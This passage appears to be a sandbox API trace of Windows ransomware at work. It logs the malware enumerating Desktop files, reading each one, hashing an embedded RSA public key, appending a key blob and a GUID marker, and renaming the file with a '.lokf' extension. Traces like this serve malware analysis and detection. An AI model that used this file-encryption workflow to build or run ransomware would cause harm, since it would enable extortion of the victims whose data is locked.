nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.648] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.648] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.648] CloseHandle (hObject=0x5cc) returned 1 [0058.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.648] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.648] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NPYvWKI6z.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\npyvwki6z.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NPYvWKI6z.rtf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\npyvwki6z.rtf.lokf")) returned 1 [0058.650] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x2c5f7080, ftLastAccessTime.dwHighDateTime=0x1d4cac4, ftLastWriteTime.dwLowDateTime=0x2c5f7080, ftLastWriteTime.dwHighDateTime=0x1d4cac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NxkfKpMd", cAlternateFileName="")) returned 1 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bad0 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0058.650] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38f90f90, ftCreationTime.dwHighDateTime=0x1d4ce02, ftLastAccessTime.dwLowDateTime=0x4ada5fa0, ftLastAccessTime.dwHighDateTime=0x1d4d340, ftLastWriteTime.dwLowDateTime=0x4ada5fa0, ftLastWriteTime.dwHighDateTime=0x1d4d340, nFileSizeHigh=0x0, nFileSizeLow=0x1d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oQo1_q.jpg", cAlternateFileName="")) returned 1 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.650] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oQo1_q.jpg") returned=".jpg" [0058.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oQo1_q.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqo1_q.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.650] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=7552) returned 1 [0058.650] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.652] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1d5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.653] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.653] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1d80, lpOverlapped=0x0) returned 1 [0058.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.653] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.654] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.654] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.654] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.654] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.654] GetLastError () returned 0x0 [0058.654] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.654] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.654] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.654] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.654] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.654] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.655] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.655] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.655] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.655] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.655] CloseHandle (hObject=0x5cc) returned 1 [0058.656] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.656] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.656] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oQo1_q.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqo1_q.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oQo1_q.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqo1_q.jpg.lokf")) returned 1 [0058.657] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78fa2ba0, ftCreationTime.dwHighDateTime=0x1d4cb6a, ftLastAccessTime.dwLowDateTime=0x4591d900, ftLastAccessTime.dwHighDateTime=0x1d4d0f8, ftLastWriteTime.dwLowDateTime=0x4591d900, ftLastWriteTime.dwHighDateTime=0x1d4d0f8, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OvPRD3iWK.png", cAlternateFileName="OVPRD3~1.PNG")) returned 1 [0058.657] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.657] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.657] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OvPRD3iWK.png") returned=".png" [0058.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OvPRD3iWK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovprd3iwk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.657] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=8373) returned 1 [0058.657] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.659] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x208f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.660] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.660] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x20b5, lpOverlapped=0x0) returned 1 [0058.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.660] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.661] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.661] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.661] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.661] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.661] GetLastError () returned 0x0 [0058.661] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.661] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.661] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.661] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.661] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.661] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.662] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.662] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x20b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.662] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.662] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.662] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.662] CloseHandle (hObject=0x5cc) returned 1 [0058.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.663] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OvPRD3iWK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovprd3iwk.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OvPRD3iWK.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovprd3iwk.png.lokf")) returned 1 [0058.664] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3325580, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x3325580, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1689200, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb7e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="penelop0611_2019-11-06_10-30.exe_.exe", cAlternateFileName="PENELO~1.EXE")) returned 1 [0058.664] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.664] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0058.664] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned=".exe" [0058.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.665] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70223930, ftCreationTime.dwHighDateTime=0x1d4c59f, ftLastAccessTime.dwLowDateTime=0x3e9161e0, ftLastAccessTime.dwHighDateTime=0x1d4cb7e, ftLastWriteTime.dwLowDateTime=0x3e9161e0, ftLastWriteTime.dwHighDateTime=0x1d4cb7e, nFileSizeHigh=0x0, nFileSizeLow=0x9714, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PxUe0Rd33Z0Hx10IeT1.avi", cAlternateFileName="PXUE0R~1.AVI")) returned 1 [0058.665] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.665] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.665] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PxUe0Rd33Z0Hx10IeT1.avi") returned=".avi" [0058.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PxUe0Rd33Z0Hx10IeT1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pxue0rd33z0hx10iet1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.665] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=38676) returned 1 [0058.665] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.667] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x96ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.667] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.668] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.668] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x9714, lpOverlapped=0x0) returned 1 [0058.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.668] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.668] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.669] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.669] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.669] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.669] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.669] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.669] GetLastError () returned 0x0 [0058.669] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.669] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.669] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.669] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.669] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.669] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 